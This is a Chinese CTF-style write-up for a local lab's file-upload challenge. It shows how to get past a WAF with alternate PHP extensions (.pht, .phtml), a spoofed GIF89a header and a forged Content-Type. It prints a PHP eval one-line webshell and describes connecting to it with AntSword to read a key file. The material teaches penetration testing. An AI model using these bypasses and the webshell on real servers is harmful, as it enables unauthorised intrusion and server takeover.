PTE靶场包含5道Web题之文件上传靶场
文件上传
打开本地搭建的网址,发现需要绕过WAF过滤规则,上传获取WebShell,并读取根目录下的key.php文件
由于绕WAF要不停进行测试,我们用手工测试一次一次尝试比较繁琐,我们可以使用BurpSuite工具对上传数据包进行抓取,然后发送到"Repeater"重放模块,进行尝试绕WAF。
文件上传常规判断目标网站如何检查的手段有:
上传文件时,常规的可以对WAF进行绕过尝试方法有:
通过以上的两图,我们通过BurpSuite重放模块逐一进行尝试。
经过一系列尝试有两种方法进行绕过:
方法一:制作图片马,抓包并修改文件名即可绕过
首先制作一张含有一句话木马的图片文件,如图所示(用记事本打开正常图片文件,并在末尾处加上一句话木马)
尝试上传一张含有一句话木马的图片,并打开地址,发现上传正常,说明图片中所含的一句话木马未被识别出来。
抓上传文件的包。修改filename,将plane.jpeg修改为plane.pht(修改为plane.phtml也可以成功),如图所示,发现上传成功:
上传成功后打开文件地址发现php一句话木马已被解析,之后使用蚁剑进行连接即可,蚁剑连接在文章末尾
方法二:制作一句话木马文件,并将文件保存并命名为a.php
<?php @eval($_POST['a']);?>
将含有一句话木马的php文件的Content-Type和文件头修改为gif文件的Conttent-Type和文件头(GIF89a),并将.php后缀修改为.pht即可绕过
如图所示:
发现上传成功!
上传成功后使用蚁剑进行连接,输入一句话木马的密码后连接成功
打开网站根目录查看key.php即可获得目标key
总结:本题利用的知识点是:黑名单中上传特殊的可解析后缀(.pht、.phtml)和检查内容的文件头检查和白名单的MIME绕过(Content-Type)三种绕过方式结合后上传含有一句话木马的文件对WAF进行绕过